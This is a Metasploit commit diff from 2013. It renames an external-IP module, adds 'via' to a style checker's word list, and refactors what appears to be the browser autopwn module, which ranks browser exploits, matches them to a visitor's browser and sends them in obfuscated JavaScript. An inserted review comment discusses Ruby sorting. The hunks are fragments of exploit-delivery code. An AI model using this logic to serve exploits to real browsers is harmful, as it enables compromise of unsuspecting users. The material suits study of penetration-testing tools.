bug/bundler_fix
jvazquez-r7 2013-03-21 09:07:41 +01:00
commit b30a5aa6e8
3 changed files with 74 additions and 85 deletions


@ -17,8 +17,13 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'External IP', 'Name' => 'Discover External IP via Ifconfig.me',
'Description' => 'This module checks for the public source IP address of the current route to the RHOST', 'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan'], 'Author' => ['RageLtMan'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>


@ -385,8 +385,8 @@ class Metasploit3 < Msf::Auxiliary
def start_exploit_modules() def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0") @lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {} @noscript_tests = {}
@all_tests = {}
print_line print_line
print_status("Starting exploit modules on host #{@lhost}...") print_status("Starting exploit modules on host #{@lhost}...")
@ -446,20 +446,24 @@ class Metasploit3 < Msf::Auxiliary
end end
# Now that we've got all of our exploit tests put together, # Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and # organize them into an all tests (JS and no-JS), organized by rank,
# doesnt-require-scripting, sorted by browser name. # and doesnt-require-scripting (no-JS), organized by browser name.
if apo[:javascript] && apo[:ua_name] if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests[apo[:ua_name]].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:javascript] elsif apo[:javascript]
@js_tests["generic"] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests["generic"].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:ua_name] elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= [] @noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo) @noscript_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
else else
@noscript_tests["generic"] ||= [] @noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo) @noscript_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
end end
end end
@ -501,9 +505,8 @@ class Metasploit3 < Msf::Auxiliary
print_line print_line
# Sort the tests by reliability, descending. # Sort the tests by reliability, descending.
@js_tests.each { |browser,tests| # I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
tests.sort! {|a,b| b[:rank] <=> a[:rank]} @all_tests = @all_tests.sort.reverse
}
# This matters a lot less for noscript exploits since they basically # This matters a lot less for noscript exploits since they basically
# get thrown into a big pile of iframes that the browser will load # get thrown into a big pile of iframes that the browser will load
@ -511,7 +514,6 @@ class Metasploit3 < Msf::Auxiliary
@noscript_tests.each { |browser,tests| @noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]} tests.sort! {|a,b| b[:rank] <=> a[:rank]}
} }
end end
# #
@ -746,7 +748,10 @@ class Metasploit3 < Msf::Auxiliary
# if we have no client_info, this will add all tests. Otherwise tries # if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected # to only send tests for exploits that target the client's detected
# browser. # browser.
@js_tests.each { |browser, sploits|
@all_tests.each { |rank, sploits|
sploits.each { |s|
browser = s[:ua_name] || "generic"
next unless client_matches_browser(client_info, browser) next unless client_matches_browser(client_info, browser)
# Send all the generics regardless of what the client is. If the # Send all the generics regardless of what the client is. If the
@ -754,8 +759,8 @@ class Metasploit3 < Msf::Auxiliary
# on the side of shells and send everything. Otherwise, send only # on the side of shells and send everything. Otherwise, send only
# if the client is using the browser associated with this set of # if the client is using the browser associated with this set of
# exploits. # exploits.
if s[:javascript]
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name])) if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
sploits.each do |s|
if s[:vuln_test].nil? or s[:vuln_test].empty? if s[:vuln_test].nil? or s[:vuln_test].empty?
test = "is_vuln = true" test = "is_vuln = true"
else else
@ -777,6 +782,7 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
end end
js << "global_exploit_list[global_exploit_list.length] = {\n" js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n" js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n" js << " 'resource':'#{res}'\n"
@ -784,17 +790,7 @@ class Metasploit3 < Msf::Auxiliary
sploits_for_this_client.push s[:name] sploits_for_this_client.push s[:name]
sploit_cnt += 1 sploit_cnt += 1
end end
end else
}
# Add a javaEnabled() test specifically for java exploits. Other
# exploits that don't require javascript go into a big pile of iframes
# that will be dumped out after other exploitation is done, assuming
# the browser didn't stop somewhere along the way due to a successful
# exploit or a crash from all the memory raping we just did.
noscript_html = ""
@noscript_tests.each { |browser, sploits|
sploits.each do |s|
if s[:name] =~ %r|/java_| if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'") res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n" js << "global_exploit_list[global_exploit_list.length] = {\n"
@ -810,18 +806,7 @@ class Metasploit3 < Msf::Auxiliary
sploit_cnt += 1 sploit_cnt += 1
end end
} }
}
# If all of our exploits that require javascript fail, try to continue
# with those that don't
js << %Q|var noscript_exploits = "|
js << Rex::Text.to_hex(noscript_html, "%")
js << %Q|";\n|
js << %Q|var noscript_div = document.createElement("div");\n|
# Have to use innerHTML here to render the new iframes. Using
# document.createElement and appendChild() will escape all the
# entities.
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
js << %Q|document.body.appendChild(noscript_div);\n|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n" js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
js << "window.next_exploit(0);\n" js << "window.next_exploit(0);\n"
@ -830,7 +815,6 @@ class Metasploit3 < Msf::Auxiliary
js.obfuscate unless datastore["DEBUG"] js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}" response.body = "#{js}"
print_status("Responding with #{sploit_cnt} exploits") print_status("Responding with #{sploit_cnt} exploits")
sploits_for_this_client.each do |name| sploits_for_this_client.each do |name|
vprint_status("* #{name}") vprint_status("* #{name}")
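Review bot: `@all_tests = @all_tests.sort.reverse`, in the hunk under "Sort the tests by reliability, descending", silently turns `@all_tests` from a Hash into an Array of `[rank, tests]` pairs, and the existing comment only hints at this. The later `@all_tests.each { |rank, sploits|` keeps working only because block destructuring accepts both shapes, so I would state it in the comment: `# Hash#sort returns an Array of [rank, tests] pairs, so @all_tests is an Array from here on`. If `apo[:rank]` can ever be nil alongside numeric ranks (not visible in these hunks), the pair comparison inside `sort` would raise ArgumentError, and `@all_tests = @all_tests.sort_by { |rank, _| rank.to_i }.reverse` would be the safer form. The enclosing methods start and end outside the hunks shown.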


@ -277,7 +277,7 @@ class Msftidy
if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/ if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/
words = $1.split words = $1.split
words.each do |word| words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word) if %w{and or the for to in of as with a an on at via}.include?(word)
next next
elsif %w{pbot}.include?(word) elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/ elsif word =~ /^[a-z]+$/